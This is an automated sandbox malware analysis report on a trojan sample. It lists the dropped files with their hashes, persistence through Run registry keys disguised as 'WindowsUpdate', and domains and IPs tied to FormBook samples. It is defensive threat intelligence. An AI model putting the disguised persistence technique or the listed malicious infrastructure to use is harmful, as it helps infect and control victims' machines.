                      https://www.autoitscript.com/autoit3/u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drfalse
                        		high

                        World Map of Contacted IPs

                        No contacted IP infos

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1586017
                        Start date and time:2025-01-08 16:18:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 10m 3s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:23
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Sample name:u549ed5dEA.exe
                        renamed because original name is a hash value
                        Original Sample Name:f3c0f469753fe8f40c2f45cee815d8afb9fa2b54f2b6a32a14bf3dd1db56f3b7.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@33/70@2/0
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 97%
                        • Number of executed functions: 185
                        • Number of non-executed functions: 222
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • VT rate limit hit for: u549ed5dEA.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        10:19:18API Interceptor1x Sleep call for process: u549ed5dEA.exe modified
                        16:19:24AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls
                        16:19:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls
                        16:19:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        www.127358.winQuotation Request-349849.exeGet hashmaliciousFormBookBrowse
                        • 206.238.89.119
                        QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                        • 206.238.89.119
                        lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                        • 206.238.89.119
                        Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                        • 206.238.89.119
                        IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                        • 206.238.89.119
                        need quotations.exeGet hashmaliciousFormBookBrowse
                        • 206.238.89.119
                        www.supernutra01.onlineORDER - 401.exeGet hashmaliciousFormBookBrowse
                        • 172.67.220.36
                        01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                        • 104.21.24.198
                        DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                        • 172.67.220.36
                        PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                        • 104.21.24.198
                        PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                        • 104.21.24.198
                        Payment-251124.exeGet hashmaliciousFormBookBrowse
                        • 104.21.24.198
                        DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                        • 104.21.24.198
                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                        • 172.67.220.36
                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                        • 172.67.220.36
                        Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                        • 172.67.220.36

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp21wYGO0mAN2.exeGet hashmaliciousAsyncRATBrowse
                          yjOJ1YK5M3.exeGet hashmaliciousAsyncRATBrowse
                            Rage.exeGet hashmaliciousUnknownBrowse
                              Rage.exeGet hashmaliciousUnknownBrowse
                                copia111224mp.htaGet hashmaliciousUnknownBrowse
                                  FX6KTgnipP.exeGet hashmaliciousFormBookBrowse
                                    uhbrQkYNzx.exeGet hashmaliciousFormBookBrowse
                                      qPLzfnxGbj.exeGet hashmaliciousFormBookBrowse
                                        ngPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          FS04dlvJrq.exeGet hashmaliciousFormBookBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\addfgcgdsm.bmp

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):594
                                            Entropy (8bit):5.507408293701256
                                            Encrypted:false
                                            SSDEEP:12:ZiJN6NXVBVmhTFFBPSxXjvwF4CPtPEqcNM/DjeUmVI8oX0Q:oN6NXHEBFFgXj4nPtsjMHoI8c0Q
                                            MD5:B88AEBA366E943BAD395D31552AB26CF
                                            SHA1:278159E50CB4F4366E25E0BFC68908ED4B9F90FC
                                            SHA-256:7216D27B6B287635CF958E6EC3A70EB2AF8D931CFBE98D9BD283A7E97A07C998
                                            SHA-512:0EA99A1CF2FB2B4DAA4CCB45161554AD067D77AB7C216BF8933261A9E9CD26F3ABA8F0442D1833956561ECD94AAC243394F6AA9E06846D3B8058C5679845BF54
                                            Malicious:false
                                            Preview:M7OO13O4RK39V9UE1B4n614130FZw6ryc0N9z419q74g22xRl1K42..DateTimeConstants ButtonConstants..I7b4f2QL2LKRVhL0460IS7w32jI0A68i39d0wsH..ButtonConstants TreeViewConstants..9P5Caya7G2t57gOkT2Y54664Fz8y4ghx3t403M880om0se9x2zH0765Z4eKN0ImnjSKd57lc545kdtPFn8B2pF0f116r86JC1358y11uPLP871d72C183179y3c4K6E0..BorderConstants ColorConstants..65nTlv0085K42256173z2tFay74p3R4u9FfGIc0kSU6L672d62..FontConstants DateTimeConstants..929Og2FKe38Zj95Y6I289JCS45wJXsIct6kZ9g052ESB57862442T7tA7V4A808o6RK6u5Km003Np289xN00uS906dd97U0192r56R82Y601ooLi75071og4587ci01085SY32e0TWB0mRG8K7..ToolbarConstants ComboConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\avnjkduhv.xls

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):670
                                            Entropy (8bit):5.597883776857722
                                            Encrypted:false
                                            SSDEEP:12:IXZJmIILZCChnctXTSlpICrBP0VSFdX13/IewTbe5rqx2nRFcRsaTMHTSRrBPc:IXZsIIFbhctDSlpICrmMdF3/I9betPUq
                                            MD5:F112FCC371CBFB12796BFA2212039663
                                            SHA1:8326FDD102E399A0FA537A4AC52FCFE5360EF907
                                            SHA-256:2E3E1E2D4DBA918789092E53E24AD6A92A03E0A09122A1C8F7303BCE86112D93
                                            SHA-512:ACA9965AA95547B7B0DF1C4E3910EA1827435BB4AB960E47E66B02816F2A33A4E2B76C6345B3A4F2FD41F32311FE013C74ECCC5470F0C710AC13223B6291E498
                                            Malicious:false
                                            Preview:o6v03oK0996464lYq534HVzNv678242sT5eG0xcEMf7JqynCi6z202eY45b7L76a6LmJHe108D750aKYUSRO6EpxFy276kD7t15mG6gvQ15tzpoo6k4r10o4LP491UM9I9jrdyCt22KK589548OYAKk95Y8ylZ1Sp5wJ153k82M6uq8k..StructureConstants TreeViewConstants..8IhHtZI4Z6I6pS2S2H9iR33iV931849..ColorConstants ColorConstants..Q74d0aR78386L5hg84t9g1t87i3Sy5gDr3E6VX3oG8u237Q6HW725..DateTimeConstants FileConstants..brs9892L670246I17I9FA6GnPbP7R9J1h737c62Iw5P40kY7gnh..GuiDateTimePicker StructureConstants..28rZ73A2oL35Hc3Wh718uZR5615KJh5F9J0sg89ba6N7r8k359i228025a5345e1t54RRP4D2nG9046lbtR43Fu0p297S04AhTqa8U6i8Pgq3JsL038U32XB85Y337Di0T2d1BX866r4Kdu66L3Iv94QS601171N16mR046zC31..StructureConstants TreeViewConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):947288
                                            Entropy (8bit):6.629681466265794
                                            Encrypted:false
                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: 1wYGO0mAN2.exe, Detection: malicious, Browse
                                            • Filename: yjOJ1YK5M3.exe, Detection: malicious, Browse
                                            • Filename: Rage.exe, Detection: malicious, Browse
                                            • Filename: Rage.exe, Detection: malicious, Browse
                                            • Filename: copia111224mp.hta, Detection: malicious, Browse
                                            • Filename: FX6KTgnipP.exe, Detection: malicious, Browse
                                            • Filename: uhbrQkYNzx.exe, Detection: malicious, Browse
                                            • Filename: qPLzfnxGbj.exe, Detection: malicious, Browse
                                            • Filename: ngPebbPhbp.exe, Detection: malicious, Browse
                                            • Filename: FS04dlvJrq.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2.exe

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):947288
                                            Entropy (8bit):6.629681466265794
                                            Encrypted:false
                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\awggmrd.xls

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):122214412
                                            Entropy (8bit):7.090094286382183
                                            Encrypted:false
                                            SSDEEP:49152:tLe6UYaLCBjCSgCN3TmQRMMpVPDWbQtL3PUa8TfTqul5Pa0JxnZAdrBcNBqu3QRb:b
                                            MD5:592AAF7AE0777B3173CFBB4D04C15DF8
                                            SHA1:CD6104DCC2D35EA01E30EBDF48556FE7256D14B5
                                            SHA-256:5691F5E0DC26586D217400C04331D2BFDF334868C9E53EAD09548B38F1FE31C1
                                            SHA-512:E5756FDC46E849FDB2FB2AB4AE6F2475B783E13D58C6EC1E35AA5D5A7CC9C98849E966C5EA7D4571960AA357538150A4165359CB4EBAC45CD618DFAFB2E59021
                                            Malicious:false
                                            Preview:..;....$....G.c.........o...p.E?.[.....#...~..xq.....<.9P.*..J....y..^he...1..:.........3.$..%..d...L.E..J...ip.h.!_.y..`..l.~......#.c.s.......|3>,...... ..7<.7.....PCi......w....*a._.'.^u..x..(..Ynyz.U....}.!cZ..X........+.KS.....g=R.x0..>..#..tR....QIR..<....K...q...k>&=(.\.............7.l.P.k.0.X.7.8.I.1.7.5.2.K.k.4.9.D.3.Y.8.5.w.Q.8.3.....3.4.f.7.n.2.2.s.i.7.R.7.4.I.a.T.p.L..... ..@.....V&..(.U....z....tZ....H.).&......,...#.3...0.. #.I6.....a.....R....>6.=x..3W.$...,...8:........n...{8 ...(.............Z8...a.1.Q..D..Rg(.l.......o..p.$Z..>q.....b.E.7.v.2.r.Y.3.4.g.4.3.4.w.G.7.....7.v.9.d.1.1.9.8.4.M.4.2.2.a.2.Y.7.o.O.7.3.D.9.n.5.H.1.3.0.t.g.V.6.9.0.D.3.......}:...........@-);=.....'..*Nt.i+%.j.HY^...:5....%...F...X,e..K.f.x...m..@..+D..D%K?..].S*....j .}.:."c..W3.......&5............4!..T}.g.l..02.sa.n...&..,B....I.:.v8`..`0..N..|.6.$.......C.3.n.6.3.2.q.G.c.w.Q.7.U.2.r.8.w.4.V.8.7.0.8.2.0.2.b.....l.l.2.0.8.6.8.D.9.4.8.2.k.....0.A.l.0.T.8.

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\bvabjg.txt

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):577
                                            Entropy (8bit):5.640429072038616
                                            Encrypted:false
                                            SSDEEP:12:KzK5kVs9MroNFATPrBPSlN1RSzar9OQz9987zYrBPsU5IFsBxDOEW5DX9XrTPh:Km5kVtX0NbSzEOc9HrV5weFQ5L9J
                                            MD5:F5A3546A93EF257DF068E0183A6BE09A
                                            SHA1:005DFFFAED36B3161EC8957D9E4DBB4D9F62999E
                                            SHA-256:A020A025B6515668596CBA7B29F7D59E0FDCC868FEB7CE921122CCB169D1E957
                                            SHA-512:491922F37C2F14DD0DA11005A0C037EA4CCC16B70E2F6221303F04C007F943BD8EC2DA8F38CCF90D9F7E2B35910A1E36FD46E3153A9859C22A020F12841BF14C
                                            Malicious:false
                                            Preview:66tqo4f0V85CXzZ5D5j909j5W7W2074Q7wNpHAzUYND96kaEx0XX2cS99JRBv310K84ya908JPPYL568sIEv4Sl070ZX2oO6..TreeViewConstants TreeViewConstants..1L2342QJnH7hL0Zzu6frIfX4374b36N5z1w554D76746q9df6BBO513s6y7hk395M6hzU7EsF1H9385H1f26Zo8jM9eS31Z8V71aLi78E6PZ765Nc06Al13R6zQdTT2m7VdHYuaZ479T747wI1859YUFvo6Bs565..StructureConstants TreeViewConstants..7WmO9O2hV3uAZ8ty31PuZ648j3W9I3grG175MB7p8h959Z5Or78M7z2Kk607578p8461Gu187K1o366qRBJy4ix4lR..ButtonConstants ButtonConstants..Cx20UMhc13zi85de22o7i48nII5VH02j0v8UB10917vP551344f4Qy9098FMIr0Xh4z1249w3Gu00y4V7y..TreeViewConstants FileConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\fvrgktttt.bmp

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):611
                                            Entropy (8bit):5.616959606642095
                                            Encrypted:false
                                            SSDEEP:12:ucVB/2TDK48htLgPdCGPKZMcz1qGmcuN0E1308XyyBM0aJnp0:uk/2TuTbLoAfl8ouNXTMl9p0
                                            MD5:5E6C2647A97A583AC8F0458C69AA0682
                                            SHA1:8394116D40D013C7A4776B96C980B665C82C8171
                                            SHA-256:F63996739B631500B68326D0DE1FDAEDBF874072ADBCF63FA08FEB5A9E140E35
                                            SHA-512:B391F6CFA533D6D6B150BEDF87E9DB5F156D82649D7C8F9EBF75695100963852361F9DBA6BADCC67344F6F65B4903E7D4267154214599C8F4E41530FD94A77A0
                                            Malicious:false
                                            Preview:5z13y2O76R..DateTimeConstants UpDownConstants..zOL39276v763N5vMkbw3lC676v17tN6M63w121O81tw45NP1L6R80UTO0Ev48T199nvO2J8v7BM693224r7zj2l5vS54pl77G24k3j02489768..ToolTipConstants BorderConstants..hwA8E1RdFgQh7950Rga7Q1u6uy652E38Nm79xK..TreeViewConstants UpDownConstants..9krzCtZ10gl4RR74k32A7O3Co3tQ138oI6fqJXxu1Az45iwVLWG93jK5Vaz3vv8oRNFI5021W644t58nxB2vQ92i2a564Z8gj5bzGgayF6..ComboConstants ColorConstants..QK5418H29I7W3796zlho96066S39mceq5479SlWAYPP52b59c340633A0O1U6vG5u850252svAL85Qj5D0RGtT2rQZ8qq6276M44584Cq3HTh6Jbi8TL7d1AX6g57494Qwi49n6R0dc01uqlS47hHh6MYP55n9u9F7gY30Hjm..ButtonConstants BorderConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\gbqticjd.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):547
                                            Entropy (8bit):5.537995121972547
                                            Encrypted:false
                                            SSDEEP:12:GGqnUABT2bnRxbzlg/eAZF87/ukBRdHGLF:GGqnUABTK/eNZFMGkBn6F
                                            MD5:244237D5001A3F2E94718441A5827707
                                            SHA1:204AA66EC17B4A36C9E506ED06396C6E9406D791
                                            SHA-256:2DD862795F83E17ED4868ACD1E01285E03DC05EF479E112CF6B8F8EF069218FA
                                            SHA-512:61F641408030AC6A8AA19CA26A76BF772DC2DADFD2A4EB93351A1B58B37D7CB03DB93BC0084B006A8B8F96FD54C6F43E45ABD56905F6682E410CB4312EF6F085
                                            Malicious:false
                                            Preview:0G0OVX8W4883Qv..StructureConstants GuiDateTimePicker..IpVc2YH2F986j82586N7v6Lff16258Jl5ar7918Kd5Y5047zbNrR2R7yv583X9MfGZ45z6I1f9a8yq1vMZKHtR06447Xw1p16VA7816z1n70pnhBm4jUa3L4G76qvo811029..GuiDateTimePicker BorderConstants..909G09g0d0oX4jH3v55C22000810UwCQs17Sa1235is0Ot11b7A57e9YDj..StructureConstants UpDownConstants..Y16t3c271295e24sdA4ri9qhP..FileConstants ColorConstants..53E77G7K831Qt833kevg1047eVccC..UpDownConstants ToolbarConstants..02769BCE6fC604l6zK7P261vj3A87NFd2K2RuXER21Gs8d775c9iceytX190h7z7j570Z9O..ButtonConstants ButtonConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\hbeol.xls

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):602
                                            Entropy (8bit):5.481262288382369
                                            Encrypted:false
                                            SSDEEP:12:8rBGglKFSqsmRRjPUDMWZThrQSC3r5WFThwBg3L:8rBGvAZDpu3UFNpL
                                            MD5:4BE1782DD75BEA42BD21D2CDB957D968
                                            SHA1:05D4EF3082D28664B95D40DE8BF44F2592B0A08D
                                            SHA-256:D5A56B384CFFC80A412150029EEE4093651A382F7850FF2069CAB1782B2D8CEE
                                            SHA-512:9E474360F86D242A5FC564A5CEE90E493803C7AB7ED9510DDB10472D62B17999D28717F6435EF6D0B8294A5EFDB98E4E94E4FC606486605D700E7BAF8E5FCCF1
                                            Malicious:false
                                            Preview:07o2269yr3555wFk0anf8Hd1GhH9t326e9u9c946En9vB04g813fEKMvF8Ca5r227d739F7X29X3Kov35y74S4..BorderConstants DateTimeConstants..ed86R7LbyHgPEJ7Y76k7Wb2NEy..FontConstants ComboConstants..H14kHH8379m1hZ9xv9908hz97NG1k466103vHxCMM5Sa1448fd7l3a6n4dc60..TreeViewConstants FontConstants..229KC6h93e190qXlEgwGoE80ZTrl5d6NMP1FTqTB5D2I64sVv2LzN2dKq03z8T72TT859..ToolbarConstants ButtonConstants..aem6698vJuaGL3k12f11T58krp13DjFm5323499293085K89Uv8oNO9nG8K5..FontConstants DateTimeConstants..598Tb1Wk339OI29yV433Z56n020K0R55J5532v15541E5k1m00R2250r56qh4Q3v3MzPjefs2K8128y1Phdh5C7..StructureConstants ButtonConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\icusk.pdf

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):537
                                            Entropy (8bit):5.613240557651606
                                            Encrypted:false
                                            SSDEEP:12:Ngj1+3ad3h7V1T2BSQak5uoVTptBP8WBSXF0hwuzOMLcSI8waBPqP0:ijs3a9h7H2Bj5uyTbO0S10hwuSMLcmnN
                                            MD5:9BA71A01EA360FF983EF25E37B7DE07E
                                            SHA1:5C3C659DFF5DBFAF718751BDF1EA473437545E2A
                                            SHA-256:018624A9D5CA113122118CF7E654B2C75221F79AF21B1866F9001164EE9D1072
                                            SHA-512:B5DEEB3F27B1D8EAC801810BEDE1205D51D3A44AE5231A8FDFA332AD5EA4C24D78D9C70B6735ADDD2825DDDFA01BD3EB63B73C2873BBA7136EB22037A09C2360
                                            Malicious:false
                                            Preview:g1L971MaQZZdX04A5964o9M75vu37q6LR3sW6O05ETMyBkb1P2h3F9z27892eD22jB8..ToolbarConstants ToolbarConstants..6vVbUs6HGW8r3346E31o6r5371Xr0FPAdO94e11S345nP5b19dWTbG34Yco1X6844GJ455og4L948McR9oVUebvyI2FMNuO3A5Y1IpG9VCQ0k4Q7e02q3b7WPB76y698Bi6680HG0ET5S..ColorConstants TreeViewConstants..5fc8l5pW48Yu777T182Uj4nP12370Pv782e84U29lk409MufV895283N38826JU6O3xWqHB3EbvNe640C8V01H0xz4c606tkC09Eo4O76h98ea3h05547qA3803P01Y6h29Ngz9Ko7Tn595R6DXqAzL028M9Y1e4s72SaE..ToolTipConstants TreeViewConstants..wkZ9Ew5s4rkj129..DateTimeConstants BorderConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\ijdstgvd.xls

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):536
                                            Entropy (8bit):5.563876401628908
                                            Encrypted:false
                                            SSDEEP:12:cXUUALuMiv7AFBPzsA/s+C/pqodYyUprud/iDD5sP7:mISrMF68tcYyUprG/b
                                            MD5:5E364FBA31203ABC4D6B2419B07FC38A
                                            SHA1:2591D6688946DD1B5674892ABC81FB78D91627B3
                                            SHA-256:210BCDF33BCD1A9B7F7499E168A4BF0D7B7318D69BB1220202599C9FFFBE8501
                                            SHA-512:CB92AECDA89BB657B8E96D2990D8765B8693889942EB9311D5477B3C1171C56F85A95471F7340FD50A1BE34B4A6AF5823AD88C25C0852167694A5B89889EABDA
                                            Malicious:false
                                            Preview:WDP97l7qhL6C52IJUMZ7U30a04HZ1f591l0mk2PmS2e7k5l89Un62a7264Q2072QOp0p044wJ625YuK9496Oc18h5oMu930W0E8kP1W0KV98ZO4SFs8FfN1..ColorConstants TreeViewConstants..hb1tn4vwnd47oRDqNpQz8f7j1CN2lZk3yEA57sC49i150u2b2x8A056Y61dv3F7d02Pr46O7P841iym3G7UdwZ0j0Ajs07h69Z6F7132A7012b9t62k31YN1Rb2Wb8Xgmlr5pQJz9znDi0prQ028e8U2kL9HQf65s..ToolbarConstants ButtonConstants..4Q2w7Eu37lZVX02g23wn180bo5YXnx2Wet9Z89598jp6nl8F2888I54C7r6Z1419297w986jZx0J37bLan..FontConstants ButtonConstants..11H9T3yuQx1Zr0494CW8er27oe5n12Nrg..TreeViewConstants ComboConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\iomkk.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):551
                                            Entropy (8bit):5.515387971132597
                                            Encrypted:false
                                            SSDEEP:12:yuB10ivbRou/sucPr5oDH2/dJjdPquqPvqZ9uMSL:rz7vjkucSDW/Y/HqcL
                                            MD5:8CFD0DFCB1767FC049D2657F23A3289C
                                            SHA1:BA359E38F4F0C126349670FD238AAA039AF3DE78
                                            SHA-256:D5692FF2AD6BB042FCA29AD60B7661F316946827110726304443B43194AB0AA2
                                            SHA-512:EAAE358A86F66E7AEF043B9FDD1361E3261584FA3460FE18D58D350606AB8A55F9EBEEB9FB9746F8D8FDC0B840AC626AB26356DC2F4479C84426672151419AFE
                                            Malicious:false
                                            Preview:YFD36b9G3a178KQl0D183ct077G9h5M052XA70k9E82mo69B7E5q120tR163JA880i6N5N06E2Wi2w9o088o4OI43nLr01c87h28tO66TPp3P044o8JAnGoOa998J09wKMwpY3NF3m84D0Y78n1Dne..ColorConstants DateTimeConstants..3C4527VG3vEaOo20720YI180k8EE5F9W78fbn56KX3Kw3J3046L41Geg5d0539U8v0F2F7..ComboConstants ColorConstants..sH27D390Cpu63nm89290710Yr52JkV752oR6R3fr3YP117a70J223ws2v9r10RlUn5We7V0P74E80WN11e8lSGE..TreeViewConstants GuiDateTimePicker..yy5Y9j6uXN8K0jB0Muw00d829sun399szi9160160EZ2WC8nesp5G0c27MQFlUBs9HOh98840eKHofDm5F7M0C246aoECG639Q..StructureConstants ButtonConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (420), with CRLF, CR line terminators
                                            Category:dropped
                                            Size (bytes):76958
                                            Entropy (8bit):3.0371489066311255
                                            Encrypted:false
                                            SSDEEP:192:yJJJJJJJJJJJJJJJJJJJJJJJJJJJ+FJJJJJJJJJJJJJJJJJJJJJJJJJJJZJJJJJZ:4ex
                                            MD5:0B74B0649F7B632C9216C394DB8B285C
                                            SHA1:BFF6937038E3E23A57A8CD26219B46885EC6E982
                                            SHA-256:591E0A95828677F501CE772B6FF16DAF03A8043809D8AA490A83525A38DE537C
                                            SHA-512:8A50A391CC91BD76C6D035FD8EC4A9B2EDF9CC2F738EF604E1A2E49EBB34DCF2E9BED20F5C4AEEF7B105230FEBFA77FAA14117AF1C48852A5277FC18BE92D254
                                            Malicious:true
